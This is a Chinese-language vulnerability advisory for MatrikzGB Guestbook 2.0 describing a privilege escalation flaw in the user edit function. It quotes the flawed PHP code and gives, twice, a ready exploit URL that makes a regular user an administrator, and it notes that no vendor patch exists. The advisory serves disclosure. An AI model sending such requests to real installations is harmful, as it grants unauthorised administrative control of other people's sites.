添加时间:
2005-08-15

系统编号:
WAVDB-00352
BUGTRAQ: 8430

影响版本:
MatrikzGB Guestbook 2.0

程序介绍:

MatrikzGB Guestbook是一款基于WEB的留言本系统。

漏洞分析:

MatrikzGB Guestbook由于对用户提交的URI参数缺少充分过滤，远程攻击者可以利用这个漏洞把普通用户提升为管理员权限的用户。

此问题存在于用户的编辑功能中，任意普通用户可以更改权限或对目前存在用户的权限进行修改，问题代码如下：

if ($new_username !=    && $new_password !=   ) { 
create_user($new_username,$new_password,$new_rights,$entry_index); 
echo  <tr><th class=\ ok\ >Der Benutzer wurde angelegt! ; 

提交类似如下的请求，可导致普通用户拥有管理员权限：

http://www.target.com/php/gaestebuch/admin/index.php?do=options&action=optionsok&new_username=regularuser&new_password=regularpass&new_rights=admin&user=regularuser&pass=regularpass

漏洞利用:

http://www.target.com/php/gaestebuch/admin/index.php?do=options&action=optionsok&new_username=regularuser&new_password=regularpass&new_rights=admin&user=regularuser&pass=regularpass

解决方案:
厂商补丁：
MatrikzGB
---------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：
http://www.matrikz-design.de/index.php

信息来源:
<*来源：Stephan S （mastamorphixx@web.de）
链接：http://marc.theaimsgroup.com/?l=bugtraq&m=106122349430118&w=2
*>